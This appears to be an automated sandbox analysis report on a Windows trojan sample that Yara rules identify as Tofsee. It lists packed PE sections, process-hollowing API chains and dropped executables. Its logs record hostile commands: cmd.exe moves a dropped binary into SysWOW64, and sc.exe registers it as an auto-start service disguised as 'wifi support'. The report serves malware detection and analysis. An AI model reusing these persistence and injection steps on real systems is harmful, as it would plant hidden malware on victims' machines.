                      Source: Yara matchFile source: 3.0.ZA3cYU28Yl.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.rcvfbte.5f15a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.0.ZA3cYU28Yl.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.333262137.00000000005B1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.333204148.00000000004A0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000000.327467083.0000000005AC1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.407171768.00000000005C0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.385289105.0000000000530000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000014.00000002.407257194.00000000005E1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.385864770.0000000002441000.00000004.00020000.sdmp, type: MEMORY
                      Source: 9460.exe, 00000010.00000002.437004184.000000000068A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      Spam, unwanted Advertisements and Ransom Demands:

                      barindex
                      Yara detected TofseeShow sources
                      Source: Yara matchFile source: 26.3.A881.exe.7f0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.A881.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.A881.exe.6c0e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.A881.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000001A.00000002.443373510.00000000006C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000002.443196839.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000001A.00000003.404265838.00000000007F0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: A881.exe PID: 7004, type: MEMORYSTR

                      System Summary:

                      barindex
                      PE file has nameless sectionsShow sources
                      Source: 41A3.exe.10.drStatic PE information: section name:
                      Source: 41A3.exe.10.drStatic PE information: section name:
                      Source: 41A3.exe.10.drStatic PE information: section name:
                      Source: 41A3.exe.10.drStatic PE information: section name:
                      Source: 41A3.exe.10.drStatic PE information: section name:
                      Source: 41A3.exe.10.drStatic PE information: section name:
                      Source: 7F9A.exe.10.drStatic PE information: section name:
                      Source: 7F9A.exe.10.drStatic PE information: section name:
                      Source: 7F9A.exe.10.drStatic PE information: section name:
                      Source: 7F9A.exe.10.drStatic PE information: section name:
                      Source: 7F9A.exe.10.drStatic PE information: section name:
                      Source: 7F9A.exe.10.drStatic PE information: section name:
                      Source: 8ECE.exe.10.drStatic PE information: section name:
                      Source: 8ECE.exe.10.drStatic PE information: section name:
                      Source: 8ECE.exe.10.drStatic PE information: section name:
                      Source: 8ECE.exe.10.drStatic PE information: section name:
                      Source: 8ECE.exe.10.drStatic PE information: section name:
                      Source: 8ECE.exe.10.drStatic PE information: section name:
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6608 -ip 6608
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 1_2_0042A1A0
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 1_2_00424B10
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 1_2_0042AF80
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 1_2_005731FF
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 1_2_00573253
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 3_2_00402A5F
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 3_2_00402AB3
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 3_1_00402A5F
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 3_1_00402AB3
                      Source: C:\Users\user\AppData\Roaming\rcvfbteCode function: 15_2_00402A5F
                      Source: C:\Users\user\AppData\Roaming\rcvfbteCode function: 15_2_00402AB3
                      Source: C:\Users\user\AppData\Local\Temp\9460.exeCode function: 16_2_004027CA
                      Source: C:\Users\user\AppData\Local\Temp\9460.exeCode function: 16_2_00401FF1
                      Source: C:\Users\user\AppData\Local\Temp\9460.exeCode function: 16_2_0040158E
                      Source: C:\Users\user\AppData\Local\Temp\9460.exeCode function: 16_2_004015A6
                      Source: C:\Users\user\AppData\Local\Temp\9460.exeCode function: 16_2_004015BC
                      Source: C:\Users\user\AppData\Local\Temp\9460.exeCode function: 16_2_00411065
                      Source: C:\Users\user\AppData\Local\Temp\9460.exeCode function: 16_2_00412A02
                      Source: C:\Users\user\AppData\Local\Temp\9460.exeCode function: 16_2_0040CAC5
                      Source: C:\Users\user\AppData\Local\Temp\9460.exeCode function: 16_2_00410B21
                      Source: C:\Users\user\AppData\Local\Temp\9460.exeCode function: 16_2_004115A9
                      Source: C:\Users\user\AppData\Local\Temp\9460.exeCode function: 16_2_0048160C
                      Source: C:\Users\user\AppData\Local\Temp\9460.exeCode function: 16_2_004815DE
                      Source: C:\Users\user\AppData\Local\Temp\9460.exeCode function: 16_2_004815F6
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeCode function: 17_2_006C3253
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeCode function: 17_2_006C31FF
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeCode function: 20_2_00402A5F
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeCode function: 20_2_00402AB3
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeCode function: 20_1_00402A5F
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeCode function: 20_1_00402B2E
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeCode function: 22_2_00410800
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeCode function: 22_2_00411280
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeCode function: 22_2_004103F0
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeCode function: 22_2_004109F0
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeCode function: 26_2_0040C913
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeCode function: 26_2_0042B2A0
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeCode function: 26_2_0042A4C0
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeCode function: 26_2_00424E30
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeCode function: 27_2_052896F0
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeCode function: 27_2_05280462
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeCode function: 27_2_05280470
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeCode function: 27_2_053E1810
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeCode function: 27_2_053E53F8
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeCode function: 27_2_053E0448
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeCode function: 27_2_053E2E48
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeCode function: 27_2_053FAD68
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeCode function: 27_2_053FA430
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeCode function: 27_2_053F2C88
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeCode function: 27_2_053F4758
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeCode function: 27_2_053F67B8
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeCode function: 27_2_053F08B0
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeCode function: 27_2_053F53E0
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeCode function: 27_2_053F7249
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeCode function: 27_2_053F90D3
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeCode function: 26_2_00401280 ShellExecuteExW,lstrlenW,GetStartupInfoW,CreateProcessWithLogonW,WaitForSingleObject,CloseHandle,CloseHandle,GetLastError,GetLastError,
                      Source: ZA3cYU28Yl.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: ZA3cYU28Yl.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: ZA3cYU28Yl.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: ZA3cYU28Yl.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 293.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 293.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 293.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 3657.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 9460.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 9460.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 9460.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: A019.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: A019.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: A019.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: A019.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 9779.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 9779.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 9779.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 9779.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: A881.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: A881.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: A881.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: A881.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 48E7.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 48E7.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 48E7.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: 50E7.exe.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: rcvfbte.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: rcvfbte.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: rcvfbte.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: rcvfbte.10.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: lnagngtg.exe.26.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: lnagngtg.exe.26.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: lnagngtg.exe.26.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: lnagngtg.exe.26.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dll
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeSection loaded: mscorjit.dll
                      Source: ZA3cYU28Yl.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\AppData\Local\Temp\969F.exe, type: DROPPEDMatched rule: SUSP_PE_Discord_Attachment_Oct21_1 date = 2021-10-12, author = Florian Roth, description = Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), reference = Internal Research, score =
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\gebcmxiz\
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: String function: 00422880 appears 133 times
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: String function: 0041E000 appears 172 times
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeCode function: String function: 004048D0 appears 460 times
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeCode function: String function: 006C2794 appears 35 times
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeCode function: String function: 0040EE2A appears 40 times
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeCode function: String function: 00402544 appears 53 times
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeCode function: String function: 0041E300 appears 32 times
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 1_2_00570110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 3_2_00401962 Sleep,NtTerminateProcess,
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 3_2_0040196D Sleep,NtTerminateProcess,
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 3_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 3_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 3_2_00401A0B NtTerminateProcess,
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 3_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 3_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 3_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 3_2_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 3_2_00402491 NtOpenKey,
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 3_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 3_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 3_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 3_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 3_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 3_1_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 3_1_00402491 NtOpenKey,
                      Source: C:\Users\user\AppData\Roaming\rcvfbteCode function: 15_2_00401962 Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Roaming\rcvfbteCode function: 15_2_0040196D Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Roaming\rcvfbteCode function: 15_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\rcvfbteCode function: 15_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\AppData\Roaming\rcvfbteCode function: 15_2_00401A0B NtTerminateProcess,
                      Source: C:\Users\user\AppData\Roaming\rcvfbteCode function: 15_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\rcvfbteCode function: 15_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\rcvfbteCode function: 15_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\rcvfbteCode function: 15_2_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Roaming\rcvfbteCode function: 15_2_00402491 NtOpenKey,
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeCode function: 17_2_006C0110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess,
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeCode function: 20_2_00401962 Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeCode function: 20_2_0040196D Sleep,NtTerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeCode function: 20_2_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeCode function: 20_2_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeCode function: 20_2_00401A0B NtTerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeCode function: 20_2_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeCode function: 20_2_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeCode function: 20_2_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeCode function: 20_2_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeCode function: 20_2_00402491 NtOpenKey,
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeCode function: 20_1_00402000 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeCode function: 20_1_0040250A NtEnumerateKey,NtEnumerateKey,NtClose,
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeCode function: 20_1_0040201A NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeCode function: 20_1_0040201E NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeCode function: 20_1_0040202D NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeCode function: 20_1_00402084 LocalAlloc,NtQuerySystemInformation,
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeCode function: 20_1_00402491 NtOpenKey,
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeCode function: 26_2_00401820 GetCurrentProcess,NtQueryInformationToken,
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeCode function: 26_2_00408E26: CreateFileW,DeviceIoControl,CloseHandle,
                      Source: 293.exe.10.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: 9460.exe.10.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: 48E7.exe.10.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                      Source: 41A3.exe.10.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                      Source: 7F9A.exe.10.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                      Source: 8ECE.exe.10.drStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0
                      Source: 41A3.exe.10.drStatic PE information: Section: ZLIB complexity 1.00044194799
                      Source: 41A3.exe.10.drStatic PE information: Section: ZLIB complexity 1.00537109375
                      Source: 41A3.exe.10.drStatic PE information: Section: ZLIB complexity 1.00051229508
                      Source: 41A3.exe.10.drStatic PE information: Section: ZLIB complexity 1.0107421875
                      Source: 50E7.exe.10.drStatic PE information: Section: .didata ZLIB complexity 0.999523355577
                      Source: 7F9A.exe.10.drStatic PE information: Section: ZLIB complexity 1.00044194799
                      Source: 7F9A.exe.10.drStatic PE information: Section: ZLIB complexity 1.00537109375
                      Source: 7F9A.exe.10.drStatic PE information: Section: ZLIB complexity 1.00051229508
                      Source: 7F9A.exe.10.drStatic PE information: Section: ZLIB complexity 1.0107421875
                      Source: 8ECE.exe.10.drStatic PE information: Section: ZLIB complexity 1.00044194799
                      Source: 8ECE.exe.10.drStatic PE information: Section: ZLIB complexity 1.00537109375
                      Source: 8ECE.exe.10.drStatic PE information: Section: ZLIB complexity 1.00051229508
                      Source: 8ECE.exe.10.drStatic PE information: Section: ZLIB complexity 1.0107421875
                      Source: ZA3cYU28Yl.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcess
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\rcvfbteJump to behavior
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@47/28@87/12
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeCode function: 26_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeCode function: 26_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Users\user\Desktop\ZA3cYU28Yl.exe "C:\Users\user\Desktop\ZA3cYU28Yl.exe"
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeProcess created: C:\Users\user\Desktop\ZA3cYU28Yl.exe "C:\Users\user\Desktop\ZA3cYU28Yl.exe"
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                      Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\rcvfbte C:\Users\user\AppData\Roaming\rcvfbte
                      Source: C:\Users\user\AppData\Roaming\rcvfbteProcess created: C:\Users\user\AppData\Roaming\rcvfbte C:\Users\user\AppData\Roaming\rcvfbte
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\9460.exe C:\Users\user\AppData\Local\Temp\9460.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\A019.exe C:\Users\user\AppData\Local\Temp\A019.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6608 -ip 6608
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeProcess created: C:\Users\user\AppData\Local\Temp\A019.exe C:\Users\user\AppData\Local\Temp\A019.exe
                      Source: C:\Users\user\AppData\Local\Temp\9460.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6608 -s 520
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\9779.exe C:\Users\user\AppData\Local\Temp\9779.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\A881.exe C:\Users\user\AppData\Local\Temp\A881.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\B217.exe C:\Users\user\AppData\Local\Temp\B217.exe
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /C mkdir C:\Windows\SysWOW64\gebcmxiz\
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\SysWOW64\cmd.exe" /C move /Y "C:\Users\user\AppData\Local\Temp\lnagngtg.exe" C:\Windows\SysWOW64\gebcmxiz\
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeProcess created: C:\Users\user\AppData\Local\Temp\B217.exe C:\Users\user\AppData\Local\Temp\B217.exe
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeProcess created: C:\Windows\SysWOW64\sc.exe C:\Windows\SysWOW64\sc.exe" create gebcmxiz binPath= "C:\Windows\SysWOW64\gebcmxiz\lnagngtg.exe /d\"C:\Users\user\AppData\Local\Temp\A881.exe\"" type= own start= auto DisplayName= "wifi support
                      Source: C:\Windows\SysWOW64\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
